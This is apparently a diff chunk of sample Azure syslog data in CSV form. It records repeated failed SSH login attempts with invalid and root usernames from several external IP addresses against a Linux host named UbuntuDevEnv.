+11226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:34,UbuntuDevEnv,2019-06-26 00:16:34,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 58129:11: Bye Bye [preauth],70078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,58129,,
+11227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:56,UbuntuDevEnv,2019-06-26 00:16:56,auth,UbuntuDevEnv,info,Invalid user chouji from 88.247.110.88 port 54646,70456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chouji,88.247.110.8,54646,,
+11228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:56,UbuntuDevEnv,2019-06-26 00:16:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:56,UbuntuDevEnv,2019-06-26 00:16:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,70456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:56,UbuntuDevEnv,2019-06-26 00:16:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,70452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:56,UbuntuDevEnv,2019-06-26 00:16:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:56,UbuntuDevEnv,2019-06-26 00:16:56,auth,UbuntuDevEnv,info,Invalid user nagios from 114.112.81.180 port 42370,70452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,114.112.81.1,42370,,
+11233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:01,UbuntuDevEnv,2019-06-26 00:16:58,auth,UbuntuDevEnv,info,Failed password for invalid user chouji from 88.247.110.88 port 54646 ssh2,70456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chouji,88.247.110.8,54646,,
+11234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:01,UbuntuDevEnv,2019-06-26 00:16:58,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 114.112.81.180 port 42370 ssh2,70452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,114.112.81.1,42370,,
+11235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:01,UbuntuDevEnv,2019-06-26 00:16:58,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 54646:11: Bye Bye [preauth],70456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,54646,,
+11236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:02,UbuntuDevEnv,2019-06-26 00:17:01,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 42370:11: Bye Bye [preauth],70452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,42370,,
+11237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:02,UbuntuDevEnv,2019-06-26 00:17:01,auth,UbuntuDevEnv,info,Disconnected from invalid user chouji 88.247.110.88 port 54646 [preauth],70456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chouji,88.247.110.8,54646,,
+11238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:02,UbuntuDevEnv,2019-06-26 00:17:01,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 114.112.81.180 port 42370 [preauth],70452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,114.112.81.1,42370,,
+11239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:02,UbuntuDevEnv,2019-06-26 00:17:02,auth,UbuntuDevEnv,info,Invalid user pgadmin from 104.248.121.67 port 44044,70482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgadmin,104.248.121.6,44044,,
+11240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:02,UbuntuDevEnv,2019-06-26 00:17:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:02,UbuntuDevEnv,2019-06-26 00:17:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,70482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:05,UbuntuDevEnv,2019-06-26 00:17:04,auth,UbuntuDevEnv,info,Failed password for invalid user pgadmin from 104.248.121.67 port 44044 ssh2,70482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgadmin,104.248.121.6,44044,,
+11243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:05,UbuntuDevEnv,2019-06-26 00:17:04,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 44044:11: Bye Bye [preauth],70482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,44044,,
+11244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:05,UbuntuDevEnv,2019-06-26 00:17:04,auth,UbuntuDevEnv,info,Disconnected from invalid user pgadmin 104.248.121.67 port 44044 [preauth],70482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgadmin,104.248.121.6,44044,,
+11245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:26,UbuntuDevEnv,2019-06-26 00:17:25,auth,UbuntuDevEnv,info,Invalid user haproxy from 131.100.219.3 port 56790,70667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,haproxy,131.100.219.3,56790,,
+11246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:26,UbuntuDevEnv,2019-06-26 00:17:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:26,UbuntuDevEnv,2019-06-26 00:17:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,70667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:28,UbuntuDevEnv,2019-06-26 00:17:28,auth,UbuntuDevEnv,info,Failed password for invalid user haproxy from 131.100.219.3 port 56790 ssh2,70667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,haproxy,131.100.219.3,56790,,
+11249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:28,UbuntuDevEnv,2019-06-26 00:17:28,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 56790:11: Bye Bye [preauth],70667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,56790,,
+11250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:28,UbuntuDevEnv,2019-06-26 00:17:28,auth,UbuntuDevEnv,info,Disconnected from invalid user haproxy 131.100.219.3 port 56790 [preauth],70667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,haproxy,131.100.219.3,56790,,
+11251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:31,UbuntuDevEnv,2019-06-26 00:17:31,auth,UbuntuDevEnv,info,Invalid user xavier from 118.222.146.186 port 33374,70688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,118.222.146.1,33374,,
+11252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:31,UbuntuDevEnv,2019-06-26 00:17:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:31,UbuntuDevEnv,2019-06-26 00:17:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,70688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:34,UbuntuDevEnv,2019-06-26 00:17:33,auth,UbuntuDevEnv,info,Failed password for invalid user xavier from 118.222.146.186 port 33374 ssh2,70688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,118.222.146.1,33374,,
+11255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:34,UbuntuDevEnv,2019-06-26 00:17:33,auth,UbuntuDevEnv,info,Disconnected from invalid user xavier 118.222.146.186 port 33374 [preauth],70688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,118.222.146.1,33374,,
+11256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:17:34,UbuntuDevEnv,2019-06-26 00:17:33,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 33374:11: Bye Bye [preauth],70688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,33374,,
+11257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:31,UbuntuDevEnv,2019-06-26 00:18:30,auth,UbuntuDevEnv,info,Invalid user yebni from 104.248.121.67 port 52482,70903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yebni,104.248.121.6,52482,,
+11258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:31,UbuntuDevEnv,2019-06-26 00:18:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:31,UbuntuDevEnv,2019-06-26 00:18:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,70903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:32,UbuntuDevEnv,2019-06-26 00:18:32,auth,UbuntuDevEnv,info,Invalid user di from 186.31.116.78 port 38700,70901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,di,186.31.116.7,38700,,
+11261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:32,UbuntuDevEnv,2019-06-26 00:18:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:32,UbuntuDevEnv,2019-06-26 00:18:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,70901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:33,UbuntuDevEnv,2019-06-26 00:18:32,auth,UbuntuDevEnv,info,Failed password for invalid user yebni from 104.248.121.67 port 52482 ssh2,70903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yebni,104.248.121.6,52482,,
+11264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:33,UbuntuDevEnv,2019-06-26 00:18:32,auth,UbuntuDevEnv,info,Disconnected from invalid user yebni 104.248.121.67 port 52482 [preauth],70903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yebni,104.248.121.6,52482,,
+11265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:33,UbuntuDevEnv,2019-06-26 00:18:32,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 52482:11: Bye Bye [preauth],70903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,52482,,
+11266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:34,UbuntuDevEnv,2019-06-26 00:18:34,auth,UbuntuDevEnv,info,Failed password for invalid user di from 186.31.116.78 port 38700 ssh2,70901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,di,186.31.116.7,38700,,
+11267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:34,UbuntuDevEnv,2019-06-26 00:18:34,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 38700:11: Bye Bye [preauth],70901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,38700,,
+11268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:34,UbuntuDevEnv,2019-06-26 00:18:34,auth,UbuntuDevEnv,info,Disconnected from invalid user di 186.31.116.78 port 38700 [preauth],70901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,di,186.31.116.7,38700,,
+11269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:41,UbuntuDevEnv,2019-06-26 00:18:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180  user=root,70936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,114.112.81.1,,0,
+11270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:43,UbuntuDevEnv,2019-06-26 00:18:42,auth,UbuntuDevEnv,info,Failed password for root from 114.112.81.180 port 33126 ssh2,70936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,33126,,
+11271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:43,UbuntuDevEnv,2019-06-26 00:18:43,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 33126:11: Bye Bye [preauth],70936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,33126,,
+11272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:43,UbuntuDevEnv,2019-06-26 00:18:43,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 114.112.81.180 port 33126 [preauth],70936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,114.112.81.1,33126,,
+11273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:43,UbuntuDevEnv,2019-06-26 00:18:43,auth,UbuntuDevEnv,info,Invalid user gertrude from 88.247.110.88 port 20893,70954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gertrude,88.247.110.8,20893,,
+11274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:43,UbuntuDevEnv,2019-06-26 00:18:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,70954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:43,UbuntuDevEnv,2019-06-26 00:18:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:46,UbuntuDevEnv,2019-06-26 00:18:45,auth,UbuntuDevEnv,info,Failed password for invalid user gertrude from 88.247.110.88 port 20893 ssh2,70954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gertrude,88.247.110.8,20893,,
+11277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:46,UbuntuDevEnv,2019-06-26 00:18:45,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 20893:11: Bye Bye [preauth],70954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,20893,,
+11278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:18:46,UbuntuDevEnv,2019-06-26 00:18:45,auth,UbuntuDevEnv,info,Disconnected from invalid user gertrude 88.247.110.88 port 20893 [preauth],70954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gertrude,88.247.110.8,20893,,
+11279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:09,UbuntuDevEnv,2019-06-26 00:19:09,auth,UbuntuDevEnv,info,Invalid user lian from 118.222.146.186 port 50136,71048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lian,118.222.146.1,50136,,
+11280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:09,UbuntuDevEnv,2019-06-26 00:19:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,71048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:09,UbuntuDevEnv,2019-06-26 00:19:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:11,UbuntuDevEnv,2019-06-26 00:19:11,auth,UbuntuDevEnv,info,Failed password for invalid user lian from 118.222.146.186 port 50136 ssh2,71048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lian,118.222.146.1,50136,,
+11283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:12,UbuntuDevEnv,2019-06-26 00:19:11,auth,UbuntuDevEnv,info,Disconnected from invalid user lian 118.222.146.186 port 50136 [preauth],71048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lian,118.222.146.1,50136,,
+11284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:12,UbuntuDevEnv,2019-06-26 00:19:11,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 50136:11: Bye Bye [preauth],71048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,50136,,
+11285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:47,UbuntuDevEnv,2019-06-26 00:19:47,auth,UbuntuDevEnv,info,Invalid user rabbitmq from 131.100.219.3 port 44958,71183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rabbitmq,131.100.219.3,44958,,
